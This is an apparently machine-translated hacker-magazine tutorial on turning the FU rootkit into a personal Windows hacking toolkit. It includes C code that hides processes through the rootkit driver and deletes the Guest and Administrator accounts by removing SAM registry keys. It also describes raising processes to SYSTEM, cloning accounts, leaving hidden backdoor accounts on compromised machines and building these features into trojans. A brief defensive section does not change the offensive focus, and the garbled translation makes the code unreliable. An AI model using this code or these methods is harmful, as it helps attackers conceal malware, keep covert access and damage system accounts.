Purdah: A study of fu_rootkit_ loopholes in human beings

In 2004 11, I published a "small tool qiao Delete guest/administrator account" This article, there are many friends to ask how the tool is written, in fact, the most of the code in this tool is my copy fu_rootkit over. Since friends like, these days I have a lot of ideas, then I will tell you how to fully tap the use of Fu_rootkit bar!
First go to www.rootkit.com to fu_rootkit down, before it in the Windows 2000 Professional Edition under the elevated process permissions are problematic, the new version has been fixed this problem. Fu_rootkit also be regarded as "raise in purdah people did not know", compared to Hxdef, AFX rootkit to fame much smaller, but the gold is ultimately to shine, this is not, today we let it shine!
Fu_rootkit is open source, written in C language, easy to transplant. My development environment is Windows 2000+sp4+vc6.0. The Fu_rootkit main program consists of 2 parts: Fu.exe and Msdirectx.sys. Msdirectx.sys can load core memory directly, Fu.exe is the appropriate application. Let's take a look at some of its features:
[-PL] XXX enumerates all running processes
[-PH] #PID process that hides process identifiers as PID
[-PLD] Enumerates all load drivers
[-phd] Driver_name Hide specified driver
[-pas] #PID process permissions that elevate the process identifier to PID to system
[-PRL] Lists the list of available permissions
[-prs] #PID #privilege_name Elevate process permissions for the process identifier to the specified permission
[-PSS] #PID #account_name change process token and SID
You can see that fu_rootkit can not only hide processes and drivers, change process tokens and SIDS, but also illustrate processes and drivers that are hidden by hook technology. What we are going to do today is to use Msdirectx.sys to complete our own hacker toolset!
Privilege elevation
With the permission we can arbitrarily operate, so that the computer for us to achieve a variety of functions, so the first step is the privilege to upgrade.
We know that elevated process permissions can be implemented using the PSU tool, Fu_rootkit, which can elevate any process to system permissions-not only for other processes, You can also promote your own process to system permissions OH (you will see how useful this feature is in the following article)!
The first step: loading into the Msdirectx.sys
The specific code is shown in the Initdriver () function. In fact, friends can not fully understand the code, the function directly copy the past OK.
Step two: Find the process PID
The code is as follows:
const char DESTPROC[19] = "UserManager.exe"; UserManager.exe is the process name of the program
Addprivilege (Se_debug_name); Promote process Debug permissions
HANDLE hremoteprocess = NULL;
DWORD pid = processtopid (Destproc);//The PID here is our process PID
The Processtopid function is as follows:
DWORD processtopid (const char *inputprocessname)
Functions that convert process names to process PID
{
DWORD aprocesses[1024], cbneeded, cprocesses;
unsigned int i;
HANDLE hprocess = NULL;
hmodule hmod = NULL;
Char Szprocessname[max_path] = "unknownprocess";
Elevate process permissions to debug permissions
Addprivilege (Se_debug_name);
Calculate how many processes are currently in place, aprocesses[] is used to store valid processes PIDs
if (! EnumProcesses (aprocesses, sizeof (aprocesses), &cbneeded))
{
return 0;
}
cprocesses = cbneeded/sizeof (DWORD);
Traverse all processes in a valid PID
for (i = 0; i < cprocesses; i++)
{
Open a specific PID process
hprocess = OpenProcess (process_query_information |
Process_vm_read,
FALSE, Aprocesses[i]);
Gets the process name for a specific PID
if (hprocess)
{
if (EnumProcessModules (hprocess, &hmod, sizeof (HMOD), &cbneeded))
{
GetModuleBaseName (hprocess, Hmod, szProcessName, sizeof (szProcessName));
Compares the obtained process name to the process name entered, and returns the process PID if the same
if (!stricmp (szProcessName, Inputprocessname))
{
CloseHandle (hprocess);
return aprocesses[i];
}
}
}//end of If (hprocess)
}//end of
The corresponding process name was not found and returned 0
CloseHandle (hprocess);
return 0;
}
Step three: Elevate process permissions to System
The specific code is shown in the Updatetosystem () function. This way, our process UserManager.exe has the system privileges.
Attack article
When you get the system privileges of the broiler, of course, to hide their backdoor process or drive, and then clone the account, leave a hidden account, and so on, let's take a look at these features how to use the program to achieve.
1. Clone account
Friends see the small Banyan CA tool is not very envious, want to write one? In the 2003-year Black Defense of the 7th "C language Cloning account" has been specifically introduced. In general, there are 2 ways to clone accounts: One is to use system services to read and write Sam files, the second is to use the drive to elevate the process permissions. We use the second approach here. In the "C language cloning account" in the article, because it does not have system permissions, the need to manually modify the registry to be able to operate the registry Sam folder, more cumbersome. Of course, there is no problem here, the code copy come over, sticking in our project can be.
2. Process Hide
Process hiding is the necessary self-defense ability of Trojan virus, fu_rootkit one of the most basic functions is the process of hiding, first we have to know the process of the PID or process name, and then can hide it, hidden code as follows:
DWORD Hideproc (DWORD pid)//pid is the PID of the process you want to hide
{
DWORD D_bytesread;
DWORD success;
if (! Initialized)
{
return error_not_ready;
}
Success = DeviceIoControl (Gh_device,
Ioctl_rootkit_hideme,
(void *) &pid,
sizeof (DWORD),
Null
0,
&d_bytesread,
NULL);
return success;
}
If you want to find hidden process, you can use tool RTDector0.62 tools, black defense has been introduced before.
3. Drive hidden
Drive hidden? It's a rare sight. Experienced administrators typically use command Drivers.exe to view loaded drivers (Drivers.exe can be found in a Windows 2000 resource bundle).
Did you see Msdirectx.sys exposed? And Fu_rootkit can hide their msdirectx.sys, run the command is: "C:\fu.exe–phd msdirectx.sys." Of course, this feature can also be easily ported to our program.

Defense Articles
Do not think Fu_rootkit get system permission is only used to attack, can not defend, in fact, Rootkit is a "double-edged sword", the use of appropriate, is also a good defense of the helper. At the same time, as a rookie, of course, defense for the first, so please look at the defensive chapter.
1. System users View
Now as long as open a hacker magazine, often see what "Hidden account", "Not Dead account" what, frighten me and so on rookie fear, often to the user management Daze, whether there is no problem? Here we can use Lpuser_info_3 to read user information, including user name, user full name, user description, logon times, login rights and last logon time parameters such as the code is long and simple, here is not posted, interested can view the DWORD Cusermanagerdlg: : Useralle () function.
Of course, the enumeration account can be read directly from the sam\\sam\\domains\\account\\users\\names\, and then with the Lpuser_info_3 read out of the account to compare, so you can find hidden accounts, the hidden, Not dead all back to the original form, so that you see the account "clearly, plainly."
2. Delete Guest
Let's take a look at how to delete the guest user. After you get system permissions, just delete the corresponding guest and 000001f5 folders in the registry Sam folder OK!
void Cusermanagerdlg::D eleteguest ()
{
BOOL Upresult;
Upresult=updatetosystem ();
First look at the process prompt permission to system success No
If the system succeeds if the permission is Upresult
{
Delete Guest user!
BOOL Dresult;
DRESULT=DELNT (HKEY_LOCAL_MACHINE, "Sam\\sam\\domains\\account\\users\\names\\guest");//Delete Guest folder
BOOL dResult2;
DRESULT2=DELNT (HKEY_LOCAL_MACHINE, "SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000001F5")//delete Guest ID number 000001F5 folder
if (DRESULT&AMP;&AMP;DRESULT2)
{
AfxMessageBox ("The guest user was successfully deleted!") ");
}
Else
{
AfxMessageBox ("Delete Guest user failed!") ");
}
}
Else
{
AfxMessageBox ("Elevate to system permissions failed!") ");
}
}
where the DELNT () function is a function specifically defined to delete a registry subkey.
3. Delete Administrator
See the title You don't freak out, administrator. In general, you can not delete, of course, you may go to the Control Panel-> management tools-> Computer Management to rename the account, you can also use NT Resource The Passprop tool provided by kit enables locking of the administrator. We certainly have to challenge the limit here: Delete administrator! The code is similar to deleting the guest user's code, and changing the parameters is OK, delete the administrator and the 000001f4 folder in the registry Sam folder separately. And it can be deleted under the current user of the administrator, right? Hey. If you only have such an administrator account, I am sorry, congratulations: you have no administrator on the machine!

Tip: It is strongly recommended that you first create an administrator account with a different name before you delete the admin! Deleting the administrator and guest system's built-in accounts could lead to damage to the SAM database, according to the Microsoft Information Security Anthology, but the author of the Microsoft Information Security anthology also stated: He tested no side effects.

4. Killing process Articles
Do friends often encounter this situation: in the Task Manager found an unknown process, and can not kill, said is not enough, the problem in our access to the system is no longer a problem, now viruses, Trojans and so are dual processes, mutual monitoring, to our killing process brings great inconvenience, We need to be able to simultaneously detect multiple processes. Choose the ListView control as the enumeration control for the process, select the checkbox option so that we can select multiple processes at the same time.
5. Enumerate the processes and drives hidden by hook technology
This function is Fu_rootkit's extraordinary place, can help you find the use of hook technology hidden process and Trojan. The implementation method is relatively simple, you can go to the source to view listproc (void *buffer, int buff_size) and listdriv (void) functions.

This article uses Fu_rootkit to obtain system permissions, complete a lot of practical hacker gadgets, System and administrator permissions generally look like the same, but in some of the details with the system kernel interaction, you can see that system permissions are larger. For example, some folders in the registry, the ability to read and write in physics, and so on. So what you can do after getting system permissions is much more than what we said above, and I hope we all dig together.
http://www.rootkit.com/has a lot of good sources of open source, research and expand its functionality can write a lot of useful small software. Adding its function to our pony will greatly enhance its vitality. Friends, now is not the feeling of hacker software so that everyone can write? If so, it is not a waste of my painstaking. Due to the working relationship, time is really limited, it is impossible to implement all one by one of the above function in the code, in fact, is already physically alive, a lot of functions are only need to copy the code into it. Special will delete Guest/administrator gadgets and Fu_rootkit code attached, friends upgrade can be sent to me a Oh!